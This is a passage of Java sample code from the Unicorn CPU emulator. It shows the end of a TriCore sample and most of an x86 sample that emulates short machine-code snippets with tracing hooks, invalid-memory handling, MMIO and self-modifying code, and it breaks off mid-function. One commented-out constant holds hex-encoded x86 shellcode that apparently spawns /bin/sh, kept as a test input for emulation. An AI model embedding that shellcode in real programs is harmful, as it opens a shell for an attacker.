static void test_tricore() { System.out.println("Emulate TriCore code"); Unicorn uc = new Unicorn(UC_ARCH_TRICORE, UC_MODE_LITTLE_ENDIAN); // map 2MB memory for this emulation uc.mem_map(ADDRESS, 2 * 1024 * 1024, UC_PROT_ALL); // write machine code to be emulated to memory uc.mem_write(ADDRESS, CODE); // tracing all basic blocks with customized callback uc.hook_add(hook_block, 1, 0, null); // tracing one instruction at ADDRESS with customized callback uc.hook_add(hook_code, ADDRESS, ADDRESS + CODE.length, null); // emulate machine code in infinite time (last param = 0), or when // finishing all the code. uc.emu_start(ADDRESS, ADDRESS + CODE.length, 0, 0); // now print out some registers System.out.println(">>> Emulation done. Below is the CPU context"); System.out.format(">>> d0 = 0x%x\n", uc.reg_read(UC_TRICORE_REG_D0)); System.out.format(">>> d1 = 0x%x\n", uc.reg_read(UC_TRICORE_REG_D1)); } public static final void main(String[] args) { test_tricore(); } } unicorn-2.1.1/bindings/java/src/test/java/samples/Sample_x86.java000066400000000000000000001156511467524106700246570ustar00rootroot00000000000000/* Java bindings for the Unicorn Emulator Engine Copyright(c) 2015 Chris Eagle This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License version 2 as published by the Free Software Foundation. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program; if not, write to the Free Software Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA. */ /* Unicorn Emulator Engine */ /* By Nguyen Anh Quynh & Dang Hoang Vu, 2015 */ /* Sample code to demonstrate how to emulate X86 code */ package samples; import java.math.BigInteger; import java.nio.ByteBuffer; import unicorn.*; public class Sample_x86 implements UnicornConst, X86Const { /** code to be emulated * {@code INC ecx; DEC edx; PXOR xmm0, xmm1} */ private static final byte[] X86_CODE32 = Utils.hexToBytes("414a660fefc1"); /** code to be emulated * {@code jmp 4; nop; nop; nop; nop; nop; nop} */ private static final byte[] X86_CODE32_JUMP = Utils.hexToBytes("eb02909090909090"); // private static final byte[] X86_CODE32_SELF = Utils.hexToBytes("eb1c5a89d68b02663dca7d7506660503038902fec23d4141414175e9ffe6e8dfffffff31d26a0b589952682f2f7368682f62696e89e3525389e1ca7d41414141"); /** code to be emulated * {@code PUSH ecx; PUSH ecx; PUSH ecx; PUSH ecx} */ // private static final byte[] X86_CODE32 = Utils.hexToBytes("51515151"); /** code to be emulated * {@code INC ecx; DEC edx; self_loop: JMP self_loop} */ private static final byte[] X86_CODE32_LOOP = Utils.hexToBytes("414aebfe"); /** code to be emulated * {@code mov [0xaaaaaaaa], ecx; INC ecx; DEC edx} */ private static final byte[] X86_CODE32_MEM_WRITE = Utils.hexToBytes("890DAAAAAAAA414a"); /** code to be emulated * {@code mov ecx, [0xaaaaaaaa]; INC ecx; DEC edx} */ private static final byte[] X86_CODE32_MEM_READ = Utils.hexToBytes("8B0DAAAAAAAA414a"); /** code to be emulated * {@code inc eax; mov ebx, [0x100000]; inc edx} */ private static final byte[] X86_CODE32_MEM_READ_IN_TB = Utils.hexToBytes("408b1d0000100042"); /** code to be emulated * {@code JMP outside; INC ecx; DEC edx} */ private static final byte[] X86_CODE32_JMP_INVALID = Utils.hexToBytes("e9e9eeeeee414a"); /** code to be emulated * {@code INC ecx; IN AL, 0x3f; DEC edx; OUT 0x46, AL; INC ebx} */ private static final byte[] X86_CODE32_INOUT = Utils.hexToBytes("41E43F4aE64643"); /** code to be emulated * {@code INC eax} */ private static final byte[] X86_CODE32_INC = Utils.hexToBytes("40"); //private static final byte[] X86_CODE64 = Utils.hexToBytes("41BC3BB0282A490FC9904D0FADCF4987FD904881D28ACE773548F7D9"); // <== still crash /** code to be emulated */ private static final byte[] X86_CODE64 = Utils.hexToBytes("41BC3BB0282A490FC9904D0FADCF4987FD90" + "4881D28ACE773548F7D94D29F44981C9F68A" + "C6534D87ED480FADD249F7D448F7E14D19C5" + "4D89C548F7D641B84F8D6B594D87D0686A1E" + "093C59"); /** code to be emulated * {@code add byte ptr [bx + si], al} */ private static final byte[] X86_CODE16 = Utils.hexToBytes("0000"); /** code to be emulated * {@code syscall} */ private static final byte[] X86_CODE64_SYSCALL = Utils.hexToBytes("0f05"); /** code to be emulated * {@code mov [0x20004], ecx; mov ecx, [0x20004]} */ private static final byte[] X86_MMIO_CODE = Utils.hexToBytes("890d040002008b0d04000200"); /** code to be emulated *
     * 0x1000 xor dword ptr [edi+0x3], eax ; edi=0x1000, eax=0xbc4177e6
     * 0x1003 dw 0x3ea98b13
     * 
*/ private static final byte[] X86_CODE32_SMC = Utils.hexToBytes("314703138ba93e"); /** memory address where emulation starts */ public static final int ADDRESS = 0x1000000; private static final BlockHook hook_block = (uc, address, size, user_data) -> { System.out.format( ">>> Tracing basic block at 0x%x, block size = 0x%x\n", address, size); }; private static final CodeHook hook_code = (uc, address, size, user_data) -> { System.out.format( ">>> Tracing instruction at 0x%x, instruction size = 0x%x\n", address, size); long eflags = uc.reg_read(UC_X86_REG_EFLAGS); System.out.format(">>> --- EFLAGS is 0x%x\n", eflags); // Uncomment below code to stop the emulation using uc_emu_stop() // if (address == 0x1000009) // uc.emu_stop(); }; private static final CodeHook hook_code64 = (uc, address, size, user_data) -> { long rip = uc.reg_read(UC_X86_REG_RIP); System.out.format( ">>> Tracing instruction at 0x%x, instruction size = 0x%x\n", address, size); System.out.format(">>> RIP is 0x%x\n", rip); }; private static final EventMemHook hook_mem_invalid = (uc, type, address, size, value, user) -> { switch (type) { default: // return false to indicate we want to stop emulation return false; case UC_MEM_WRITE_UNMAPPED: System.out.printf( ">>> Missing memory is being WRITE at 0x%x, data size = %d, data value = 0x%x\n", address, size, value); // map this memory in with 2MB in size uc.mem_map(0xaaaa0000L, 2 * 1024 * 1024, UC_PROT_ALL); // return true to indicate we want to continue return true; } }; private static final MemHook hook_mem64 = (uc, type, address, size, value, user_data) -> { switch (type) { default: break; case UC_MEM_READ: System.out.format( ">>> Memory is being READ at 0x%x, data size = %d\n", address, size); break; case UC_MEM_WRITE: System.out.format( ">>> Memory is being WRITE at 0x%x, data size = %d, data value = 0x%x\n", address, size, value); break; } }; // callback for IN instruction (X86). // this returns the data read from the port private static final InHook hook_in = (uc, port, size, user) -> { long r_eip = uc.reg_read(UC_X86_REG_EIP); System.out.printf( "--- reading from port 0x%x, size: %d, address: 0x%x\n", port, size, r_eip); switch (size) { case 1: // read 1 byte to AL return 0xf1; case 2: // read 2 byte to AX return 0xf2; case 4: // read 4 byte to EAX return 0xf4; } return 0; }; // callback for OUT instruction (X86). private static final OutHook hook_out = (uc, port, size, value, user) -> { long eip = uc.reg_read(UC_X86_REG_EIP); long tmp = 0; System.out.printf( "--- writing to port 0x%x, size: %d, value: 0x%x, address: 0x%x\n", port, size, value, eip); // confirm that value is indeed the value of AL/AX/EAX switch (size) { default: return; // should never reach this case 1: tmp = uc.reg_read(UC_X86_REG_AL); break; case 2: tmp = uc.reg_read(UC_X86_REG_AX); break; case 4: tmp = uc.reg_read(UC_X86_REG_EAX); break; } System.out.printf("--- register value = 0x%x\n", tmp); }; // callback for SYSCALL instruction (X86). private static final SyscallHook hook_syscall = (uc, user_data) -> { long rax = uc.reg_read(UC_X86_REG_RAX); if (rax == 0x100) { rax = 0x200; uc.reg_write(UC_X86_REG_RAX, rax); } else { System.out.format("ERROR: was not expecting rax=0x%x in syscall\n", rax); } }; private static final EventMemHook hook_memalloc = (uc, type, address, size, value, user_data) -> { long aligned_address = address & ~(0xFFFL); int aligned_size = ((int) (size / 0x1000) + 1) * 0x1000; System.out.format( ">>> Allocating block at 0x%x (0x%x), block size = 0x%x (0x%x)\n", address, aligned_address, size, aligned_size); uc.mem_map(aligned_address, aligned_size, UC_PROT_ALL); // write machine code to be emulated to memory uc.mem_write(aligned_address, X86_CODE32); // this recovers from missing memory, so we return true return true; }; public static void test_miss_code() { int r_ecx = 0x1234; // ECX register int r_edx = 0x7890; // EDX register System.out.println("Emulate i386 code - missing code"); // Initialize emulator in X86-32bit mode Unicorn uc = new Unicorn(UC_ARCH_X86, UC_MODE_32); // initialize machine registers uc.reg_write(UC_X86_REG_ECX, r_ecx); uc.reg_write(UC_X86_REG_EDX, r_edx); // tracing all instruction by having @begin > @end uc.hook_add(hook_code, 1, 0, null); // auto-allocate memory on access uc.hook_add(hook_memalloc, UC_HOOK_MEM_UNMAPPED, 1, 0, null); // emulate machine code, without having the code in yet uc.emu_start(ADDRESS, ADDRESS + X86_CODE32.length, 0, 0); // now print out some registers System.out.println(">>> Emulation done. Below is the CPU context"); System.out.format(">>> ECX = 0x%x\n", uc.reg_read(UC_X86_REG_ECX)); System.out.format(">>> EDX = 0x%x\n", uc.reg_read(UC_X86_REG_EDX)); } public static void test_i386() { int tmp; long r_ecx = 0x1234; // ECX register long r_edx = 0x7890; // EDX register // XMM0 and XMM1 registers, low qword then high qword BigInteger r_xmm0 = new BigInteger("000102030405060708090a0b0c0d0e0f", 16); BigInteger r_xmm1 = new BigInteger("00102030405060708090a0b0c0d0e0f0", 16); System.out.println("Emulate i386 code"); // Initialize emulator in X86-32bit mode Unicorn uc = new Unicorn(UC_ARCH_X86, UC_MODE_32); // map 2MB memory for this emulation uc.mem_map(ADDRESS, 2 * 1024 * 1024, UC_PROT_ALL); // write machine code to be emulated to memory uc.mem_write(ADDRESS, X86_CODE32); // initialize machine registers uc.reg_write(UC_X86_REG_ECX, r_ecx); uc.reg_write(UC_X86_REG_EDX, r_edx); uc.reg_write(UC_X86_REG_XMM0, r_xmm0); uc.reg_write(UC_X86_REG_XMM1, r_xmm1); // tracing all basic blocks with customized callback uc.hook_add(hook_block, 1, 0, null); // tracing all instruction by having @begin > @end uc.hook_add(hook_code, 1, 0, null); // emulate machine code in infinite time uc.emu_start(ADDRESS, ADDRESS + X86_CODE32.length, 0, 0); // now print out some registers System.out.println(">>> Emulation done. Below is the CPU context"); r_ecx = uc.reg_read(UC_X86_REG_ECX); r_edx = uc.reg_read(UC_X86_REG_EDX); r_xmm0 = (BigInteger) uc.reg_read(UC_X86_REG_XMM0, null); System.out.format(">>> ECX = 0x%x\n", r_ecx); System.out.format(">>> EDX = 0x%x\n", r_edx); String xmm0_string = String.format("%32s", r_xmm0.toString(16)).replace(' ', '0'); System.out.format(">>> XMM0 = 0x%s\n", xmm0_string); // read from memory tmp = Utils.toInt(uc.mem_read(ADDRESS, 4)); System.out.format(">>> Read 4 bytes from [0x%x] = 0x%x\n", ADDRESS, tmp); } public static void test_i386_map_ptr() { int tmp; int r_ecx = 0x1234; // ECX register int r_edx = 0x7890; // EDX register System.out.println("Emulate i386 code - use uc_mem_map_ptr()"); // Initialize emulator in X86-32bit mode Unicorn uc = new Unicorn(UC_ARCH_X86, UC_MODE_32); // malloc 2MB memory for this emulation ByteBuffer mem = ByteBuffer.allocateDirect(2 * 1024 * 1024); uc.mem_map_ptr(ADDRESS, mem, UC_PROT_ALL); mem.put(X86_CODE32); // initialize machine registers uc.reg_write(UC_X86_REG_ECX, r_ecx); uc.reg_write(UC_X86_REG_EDX, r_edx); // tracing all basic blocks with customized callback uc.hook_add(hook_block, 1, 0, null); // tracing all instruction by having @begin > @end uc.hook_add(hook_code, 1, 0, null); // emulate machine code in infinite time uc.emu_start(ADDRESS, ADDRESS + X86_CODE32.length, 0, 0); // now print out some registers System.out.println(">>> Emulation done. Below is the CPU context"); System.out.format(">>> ECX = 0x%x\n", uc.reg_read(UC_X86_REG_ECX)); System.out.format(">>> EDX = 0x%x\n", uc.reg_read(UC_X86_REG_EDX)); // read from memory tmp = Utils.toInt(uc.mem_read(ADDRESS, 4)); System.out.format(">>> Read 4 bytes from [0x%x] = 0x%x\n", ADDRESS, tmp); } public static void test_i386_jump() { System.out.println("Emulate i386 code with jump"); // Initialize emulator in X86-32bit mode Unicorn uc = new Unicorn(UC_ARCH_X86, UC_MODE_32); // map 2MB memory for this emulation uc.mem_map(ADDRESS, 2 * 1024 * 1024, UC_PROT_ALL); // write machine code to be emulated to memory uc.mem_write(ADDRESS, X86_CODE32_JUMP); // tracing 1 basic block with customized callback uc.hook_add(hook_block, ADDRESS, ADDRESS, null); // tracing 1 instruction at ADDRESS uc.hook_add(hook_code, ADDRESS, ADDRESS, null); // emulate machine code in infinite time uc.emu_start(ADDRESS, ADDRESS + X86_CODE32_JUMP.length, 0, 0); System.out.println(">>> Emulation done. Below is the CPU context"); } // emulate code that loop forever public static void test_i386_loop() { int r_ecx = 0x1234; // ECX register int r_edx = 0x7890; // EDX register System.out.println("Emulate i386 code that loop forever"); // Initialize emulator in X86-32bit mode Unicorn uc = new Unicorn(UC_ARCH_X86, UC_MODE_32); // map 2MB memory for this emulation uc.mem_map(ADDRESS, 2 * 1024 * 1024, UC_PROT_ALL); // write machine code to be emulated to memory uc.mem_write(ADDRESS, X86_CODE32_LOOP); // initialize machine registers uc.reg_write(UC_X86_REG_ECX, r_ecx); uc.reg_write(UC_X86_REG_EDX, r_edx); // emulate machine code in 2 seconds, so we can quit even // if the code loops uc.emu_start(ADDRESS, ADDRESS + X86_CODE32_LOOP.length, 2 * UC_SECOND_SCALE, 0); // now print out some registers System.out.println(">>> Emulation done. Below is the CPU context"); System.out.format(">>> ECX = 0x%x\n", uc.reg_read(UC_X86_REG_ECX)); System.out.format(">>> EDX = 0x%x\n", uc.reg_read(UC_X86_REG_EDX)); } // emulate code that read invalid memory public static void test_i386_invalid_mem_read() { int r_ecx = 0x1234; // ECX register int r_edx = 0x7890; // EDX register System.out.println("Emulate i386 code that read from invalid memory"); // Initialize emulator in X86-32bit mode Unicorn uc = new Unicorn(UC_ARCH_X86, UC_MODE_32); // map 2MB memory for this emulation uc.mem_map(ADDRESS, 2 * 1024 * 1024, UC_PROT_ALL); // write machine code to be emulated to memory uc.mem_write(ADDRESS, X86_CODE32_MEM_READ); // initialize machine registers uc.reg_write(UC_X86_REG_ECX, r_ecx); uc.reg_write(UC_X86_REG_EDX, r_edx); // tracing all basic blocks with customized callback uc.hook_add(hook_block, 1, 0, null); // tracing all instruction by having @begin > @end uc.hook_add(hook_code, 1, 0, null); // emulate machine code in infinite time try { uc.emu_start(ADDRESS, ADDRESS + X86_CODE32_MEM_READ.length, 0, 0); throw new RuntimeException("Expected a crash!"); } catch (UnicornException e) { System.out.println("uc.emu_start failed as expected: " + e); } // now print out some registers System.out.println(">>> Emulation done. Below is the CPU context"); System.out.format(">>> ECX = 0x%x\n", uc.reg_read(UC_X86_REG_ECX)); System.out.format(">>> EDX = 0x%x\n", uc.reg_read(UC_X86_REG_EDX)); } // emulate code that write invalid memory public static void test_i386_invalid_mem_write() { int r_ecx = 0x1234; // ECX register int r_edx = 0x7890; // EDX register int tmp; System.out.println("Emulate i386 code that write to invalid memory"); // Initialize emulator in X86-32bit mode Unicorn uc = new Unicorn(UC_ARCH_X86, UC_MODE_32); // map 2MB memory for this emulation uc.mem_map(ADDRESS, 2 * 1024 * 1024, UC_PROT_ALL); // write machine code to be emulated to memory uc.mem_write(ADDRESS, X86_CODE32_MEM_WRITE); // initialize machine registers uc.reg_write(UC_X86_REG_ECX, r_ecx); uc.reg_write(UC_X86_REG_EDX, r_edx); // tracing all basic blocks with customized callback uc.hook_add(hook_block, 1, 0, null); // tracing all instruction by having @begin > @end uc.hook_add(hook_code, 1, 0, null); // intercept invalid memory events uc.hook_add(hook_mem_invalid, UC_HOOK_MEM_READ_UNMAPPED | UC_HOOK_MEM_WRITE_UNMAPPED, 1, 0, null); // emulate machine code in infinite time uc.emu_start(ADDRESS, ADDRESS + X86_CODE32_MEM_WRITE.length, 0, 0); // now print out some registers System.out.println(">>> Emulation done. Below is the CPU context"); System.out.format(">>> ECX = 0x%x\n", uc.reg_read(UC_X86_REG_ECX)); System.out.format(">>> EDX = 0x%x\n", uc.reg_read(UC_X86_REG_EDX)); // read from memory tmp = Utils.toInt(uc.mem_read(0xaaaaaaaaL, 4)); System.out.format(">>> Read 4 bytes from [0x%x] = 0x%x\n", 0xaaaaaaaa, tmp); try { tmp = Utils.toInt(uc.mem_read(0xffffffaaL, 4)); throw new RuntimeException("Expected mem_read to fail"); } catch (UnicornException e) { System.out.format(">>> Failed to read 4 bytes from [0x%x]\n", 0xffffffaa); } } // emulate code that jump to invalid memory public static void test_i386_jump_invalid() { int r_ecx = 0x1234; // ECX register int r_edx = 0x7890; // EDX register System.out.println("Emulate i386 code that jumps to invalid memory"); // Initialize emulator in X86-32bit mode Unicorn uc = new Unicorn(UC_ARCH_X86, UC_MODE_32); // map 2MB memory for this emulation uc.mem_map(ADDRESS, 2 * 1024 * 1024, UC_PROT_ALL); // write machine code to be emulated to memory uc.mem_write(ADDRESS, X86_CODE32_JMP_INVALID); // initialize machine registers uc.reg_write(UC_X86_REG_ECX, r_ecx); uc.reg_write(UC_X86_REG_EDX, r_edx); // tracing all basic blocks with customized callback uc.hook_add(hook_block, 1, 0, null); // tracing all instructions by having @begin > @end uc.hook_add(hook_code, 1, 0, null); // emulate machine code in infinite time try { uc.emu_start(ADDRESS, ADDRESS + X86_CODE32_JMP_INVALID.length, 0, 0); throw new RuntimeException("Expected a crash!"); } catch (UnicornException e) { System.out.println("uc.emu_start failed as expected: " + e); } // now print out some registers System.out.println(">>> Emulation done. Below is the CPU context"); System.out.format(">>> ECX = 0x%x\n", uc.reg_read(UC_X86_REG_ECX)); System.out.format(">>> EDX = 0x%x\n", uc.reg_read(UC_X86_REG_EDX)); } public static void test_i386_inout() { int r_eax = 0x1234; // EAX register int r_ecx = 0x6789; // ECX register System.out.println("Emulate i386 code with IN/OUT instructions"); // Initialize emulator in X86-32bit mode Unicorn uc = new Unicorn(UC_ARCH_X86, UC_MODE_32); // map 2MB memory for this emulation uc.mem_map(ADDRESS, 2 * 1024 * 1024, UC_PROT_ALL); // write machine code to be emulated to memory uc.mem_write(ADDRESS, X86_CODE32_INOUT); // initialize machine registers uc.reg_write(UC_X86_REG_EAX, r_eax); uc.reg_write(UC_X86_REG_ECX, r_ecx); // tracing all basic blocks with customized callback uc.hook_add(hook_block, 1, 0, null); // tracing all instructions uc.hook_add(hook_code, 1, 0, null); // uc IN instruction uc.hook_add(hook_in, null); // uc OUT instruction uc.hook_add(hook_out, null); // emulate machine code in infinite time uc.emu_start(ADDRESS, ADDRESS + X86_CODE32_INOUT.length, 0, 0); // now print out some registers System.out.println(">>> Emulation done. Below is the CPU context"); System.out.format(">>> EAX = 0x%x\n", uc.reg_read(UC_X86_REG_EAX)); System.out.format(">>> ECX = 0x%x\n", uc.reg_read(UC_X86_REG_ECX)); } // emulate code and save/restore the CPU context public static void test_i386_context_save() { int r_eax = 0x1; // EAX register System.out.println("Save/restore CPU context in opaque blob"); // initialize emulator in X86-32bit mode Unicorn uc = new Unicorn(UC_ARCH_X86, UC_MODE_32); // map 8KB memory for this emulation uc.mem_map(ADDRESS, 8 * 1024, UC_PROT_ALL); // write machine code to be emulated to memory uc.mem_write(ADDRESS, X86_CODE32_INC); // initialize machine registers uc.reg_write(UC_X86_REG_EAX, r_eax); // emulate machine code in infinite time System.out.println(">>> Running emulation for the first time"); uc.emu_start(ADDRESS, ADDRESS + X86_CODE32_INC.length, 0, 0); // now print out some registers System.out.println(">>> Emulation done. Below is the CPU context"); System.out.format(">>> EAX = 0x%x\n", uc.reg_read(UC_X86_REG_EAX)); // allocate and save the CPU context System.out.println(">>> Saving CPU context"); Unicorn.Context context = uc.context_save(); // emulate machine code again System.out.println(">>> Running emulation for the second time"); uc.emu_start(ADDRESS, ADDRESS + X86_CODE32_INC.length, 0, 0); // now print out some registers System.out.println(">>> Emulation done. Below is the CPU context"); System.out.format(">>> EAX = 0x%x\n", uc.reg_read(UC_X86_REG_EAX)); // restore CPU context uc.context_restore(context); // now print out some registers System.out .println(">>> CPU context restored. Below is the CPU context"); System.out.format(">>> EAX = 0x%x\n", uc.reg_read(UC_X86_REG_EAX)); // modify some registers of the context context.reg_write(UC_X86_REG_EAX, 0xc8); // and restore CPU context again uc.context_restore(context); // now print out some registers System.out.format( ">>> CPU context restored with modification. Below is the CPU context\n"); System.out.format(">>> EAX = 0x%x\n", uc.reg_read(UC_X86_REG_EAX)); } public static void test_x86_64() { long rax = 0x71f3029efd49d41dL; long rbx = 0xd87b45277f133ddbL; long rcx = 0xab40d1ffd8afc461L; long rdx = 0x919317b4a733f01L; long rsi = 0x4c24e753a17ea358L; long rdi = 0xe509a57d2571ce96L; long r8 = 0xea5b108cc2b9ab1fL; long r9 = 0x19ec097c8eb618c1L; long r10 = 0xec45774f00c5f682L; long r11 = 0xe17e9dbec8c074aaL; long r12 = 0x80f86a8dc0f6d457L; long r13 = 0x48288ca5671c5492L; long r14 = 0x595f72f6e4017f6eL; long r15 = 0x1efd97aea331ccccL; long rsp = ADDRESS + 0x200000L; System.out.println("Emulate x86_64 code"); // Initialize emulator in X86-64bit mode Unicorn uc = new Unicorn(UC_ARCH_X86, UC_MODE_64); // map 2MB memory for this emulation uc.mem_map(ADDRESS, 2 * 1024 * 1024, UC_PROT_ALL); // write machine code to be emulated to memory uc.mem_write(ADDRESS, X86_CODE64); // initialize machine registers uc.reg_write(UC_X86_REG_RSP, rsp); uc.reg_write(UC_X86_REG_RAX, rax); uc.reg_write(UC_X86_REG_RBX, rbx); uc.reg_write(UC_X86_REG_RCX, rcx); uc.reg_write(UC_X86_REG_RDX, rdx); uc.reg_write(UC_X86_REG_RSI, rsi); uc.reg_write(UC_X86_REG_RDI, rdi); uc.reg_write(UC_X86_REG_R8, r8); uc.reg_write(UC_X86_REG_R9, r9); uc.reg_write(UC_X86_REG_R10, r10); uc.reg_write(UC_X86_REG_R11, r11); uc.reg_write(UC_X86_REG_R12, r12); uc.reg_write(UC_X86_REG_R13, r13); uc.reg_write(UC_X86_REG_R14, r14); uc.reg_write(UC_X86_REG_R15, r15); // tracing all basic blocks with customized callback uc.hook_add(hook_block, 1, 0, null); // tracing all instructions in the range [ADDRESS, ADDRESS+20] uc.hook_add(hook_code64, ADDRESS, ADDRESS + 20, null); // tracing all memory WRITE access (with @begin > @end) uc.hook_add(hook_mem64, UC_HOOK_MEM_WRITE, 1, 0, null); // tracing all memory READ access (with @begin > @end) uc.hook_add(hook_mem64, UC_HOOK_MEM_READ, 1, 0, null); // emulate machine code in infinite time (last param = 0), or when // finishing all the code. uc.emu_start(ADDRESS, ADDRESS + X86_CODE64.length, 0, 0); // now print out some registers System.out.println(">>> Emulation done. Below is the CPU context"); System.out.format(">>> RAX = 0x%x\n", uc.reg_read(UC_X86_REG_RAX)); System.out.format(">>> RBX = 0x%x\n", uc.reg_read(UC_X86_REG_RBX)); System.out.format(">>> RCX = 0x%x\n", uc.reg_read(UC_X86_REG_RCX)); System.out.format(">>> RDX = 0x%x\n", uc.reg_read(UC_X86_REG_RDX)); System.out.format(">>> RSI = 0x%x\n", uc.reg_read(UC_X86_REG_RSI)); System.out.format(">>> RDI = 0x%x\n", uc.reg_read(UC_X86_REG_RDI)); System.out.format(">>> R8 = 0x%x\n", uc.reg_read(UC_X86_REG_R8)); System.out.format(">>> R9 = 0x%x\n", uc.reg_read(UC_X86_REG_R9)); System.out.format(">>> R10 = 0x%x\n", uc.reg_read(UC_X86_REG_R10)); System.out.format(">>> R11 = 0x%x\n", uc.reg_read(UC_X86_REG_R11)); System.out.format(">>> R12 = 0x%x\n", uc.reg_read(UC_X86_REG_R12)); System.out.format(">>> R13 = 0x%x\n", uc.reg_read(UC_X86_REG_R13)); System.out.format(">>> R14 = 0x%x\n", uc.reg_read(UC_X86_REG_R14)); System.out.format(">>> R15 = 0x%x\n", uc.reg_read(UC_X86_REG_R15)); } public static void test_x86_64_syscall() { long rax = 0x100; System.out.println("Emulate x86_64 code with 'syscall' instruction"); // Initialize emulator in X86-64bit mode Unicorn uc = new Unicorn(UC_ARCH_X86, UC_MODE_64); // map 2MB memory for this emulation uc.mem_map(ADDRESS, 2 * 1024 * 1024, UC_PROT_ALL); // write machine code to be emulated to memory uc.mem_write(ADDRESS, X86_CODE64_SYSCALL); // hook interrupts for syscall uc.hook_add(hook_syscall, UC_X86_INS_SYSCALL, 1, 0, null); // initialize machine registers uc.reg_write(UC_X86_REG_RAX, rax); // emulate machine code in infinite time (last param = 0), or when // finishing all the code. uc.emu_start(ADDRESS, ADDRESS + X86_CODE64_SYSCALL.length, 0, 0); // now print out some registers System.out.println(">>> Emulation done. Below is the CPU context"); System.out.format(">>> RAX = 0x%x\n", uc.reg_read(UC_X86_REG_RAX)); } public static void test_x86_16() { int eax = 7; int ebx = 5; int esi = 6; System.out.println("Emulate x86 16-bit code"); // Initialize emulator in X86-16bit mode Unicorn uc = new Unicorn(UC_ARCH_X86, UC_MODE_16); // map 8KB memory for this emulation uc.mem_map(0, 8 * 1024, UC_PROT_ALL); // write machine code to be emulated to memory uc.mem_write(0, X86_CODE16); // initialize machine registers uc.reg_write(UC_X86_REG_EAX, eax); uc.reg_write(UC_X86_REG_EBX, ebx); uc.reg_write(UC_X86_REG_ESI, esi); // emulate machine code in infinite time (last param = 0), or when // finishing all the code. uc.emu_start(0, X86_CODE16.length, 0, 0); // now print out some registers System.out.println(">>> Emulation done. Below is the CPU context"); // read from memory byte[] result = uc.mem_read(11, 1); System.out.format(">>> Read 1 bytes from [0x%x] = 0x%x\n", 11, result[0] & 0xff); } public static void test_i386_invalid_mem_read_in_tb() { int r_eax = 0x1234; // EAX register int r_edx = 0x7890; // EDX register System.out.format( "Emulate i386 code that read invalid memory in the middle of a TB\n"); // Initialize emulator in X86-32bit mode Unicorn uc = new Unicorn(UC_ARCH_X86, UC_MODE_32); // map 2MB memory for this emulation uc.mem_map(ADDRESS, 2 * 1024 * 1024, UC_PROT_ALL); // write machine code to be emulated to memory uc.mem_write(ADDRESS, X86_CODE32_MEM_READ_IN_TB); // initialize machine registers uc.reg_write(UC_X86_REG_EAX, r_eax); uc.reg_write(UC_X86_REG_EDX, r_edx); // Add a dummy callback. // Note: if this callback is not added, the EIP will not be updated, // and EIP will read as ADDRESS after emu_start fails. uc.hook_add((MemHook) (u, type, address, size, value, user) -> { }, UC_HOOK_MEM_READ, 1, 0, null); // Let it crash by design. try { uc.emu_start(ADDRESS, ADDRESS + X86_CODE32_MEM_READ_IN_TB.length, 0, 0); throw new RuntimeException("Expected uc.emu_start to fail"); } catch (UnicornException e) { System.out.println( "uc.emu_start() failed BY DESIGN with error returned: " + e); } System.out.println(">>> Emulation done. Below is the CPU context"); long r_eip = uc.reg_read(UC_X86_REG_EIP); System.out.format(">>> EIP = 0x%x\n", r_eip); if (r_eip != ADDRESS + 1) { System.out.format( ">>> ERROR: Wrong PC 0x%x when reading unmapped memory in the middle of TB!\n", r_eip); } else { System.out.format( ">>> The PC is correct after reading unmapped memory in the middle of TB.\n"); } } public static void test_i386_smc_xor() { long r_edi = ADDRESS; // ECX register long r_eax = 0xbc4177e6L; // EDX register System.out.println("Emulate i386 code that modfies itself"); // Initialize emulator in X86-32bit mode Unicorn uc = new Unicorn(UC_ARCH_X86, UC_MODE_32); // map 1KB memory for this emulation uc.mem_map(ADDRESS, 0x1000, UC_PROT_ALL); // write machine code to be emulated to memory uc.mem_write(ADDRESS, X86_CODE32_SMC); // initialize machine registers uc.reg_write(UC_X86_REG_EDI, r_edi); uc.reg_write(UC_X86_REG_EAX, r_eax); // **Important Note** // // Since SMC code will cause TB regeneration, the XOR in fact would executed // twice (the first execution won't take effect.). Thus, if you would like // to use count to control the emulation, the count should be set to 2. // // uc.emu_start(ADDRESS, ADDRESS + 3, 0, 0); uc.emu_start(ADDRESS, 0, 0, 2); System.out.println(">>> Emulation done. Below is the result."); int result = Utils.toInt(uc.mem_read(ADDRESS + 3, 4)); if (result == (0x3ea98b13 ^ 0xbc4177e6)) { System.out.format( ">>> SMC emulation is correct. 0x3ea98b13 ^ 0xbc4177e6 = 0x%x\n", result); } else { System.out.format( ">>> SMC emulation is wrong. 0x3ea98b13 ^ 0xbc4177e6 = 0x%x\n", result); } } private static final MmioReadHandler mmio_read_callback = (uc, offset, size, user_data) -> { System.out.format( ">>> Read IO memory at offset 0x%d with 0x%d bytes and return 0x19260817\n", offset, size); // The value returned here would be written to ecx. return 0x19260817; }; private static final MmioWriteHandler mmio_write_callback = (uc, offset, size, value, user_data) -> { System.out.format( ">>> Write value 0x%d to IO memory at offset 0x%d with 0x%d bytes\n", value, offset, size); }; public static void test_i386_mmio() { long r_ecx = 0xdeadbeefL; System.out.println("Emulate i386 code that uses MMIO"); // Initialize emulator in X86-32bit mode Unicorn uc = new Unicorn(UC_ARCH_X86, UC_MODE_32); // map 1KB memory for this emulation uc.mem_map(ADDRESS, 0x1000, UC_PROT_ALL); // write machine code to be emulated to memory uc.mem_write(ADDRESS, X86_MMIO_CODE); uc.mmio_map(0x20000, 0x4000, mmio_read_callback, null, mmio_write_callback, null); // prepare ecx uc.reg_write(UC_X86_REG_ECX, r_ecx); uc.emu_start(ADDRESS, ADDRESS + X86_MMIO_CODE.length, 0, 0); System.out.format(">>> Emulation done. ECX=0x%x\n", uc.reg_read(UC_X86_REG_ECX)); } private static final EventMemHook test_i386_hook_mem_invalid_cb = (uc, type, address, size, value, user_data) -> { if (type == UC_MEM_READ_UNMAPPED || type == UC_MEM_WRITE_UNMAPPED) { System.out.format( ">>> We have to add a map at 0x%x before continue execution!\n", address); uc.mem_map(address, 0x1000, UC_PROT_ALL); } // If you really would like to continue the execution, make sure the memory // is already mapped properly! return true; }; public static void test_i386_hook_mem_invalid() { // mov eax, 0xdeadbeef; // mov [0x8000], eax; // mov eax, [0x10000]; byte[] code = Utils.hexToBytes("b8efbeaddea300800000a100000100"); System.out.println( "Emulate i386 code that triggers invalid memory read/write."); 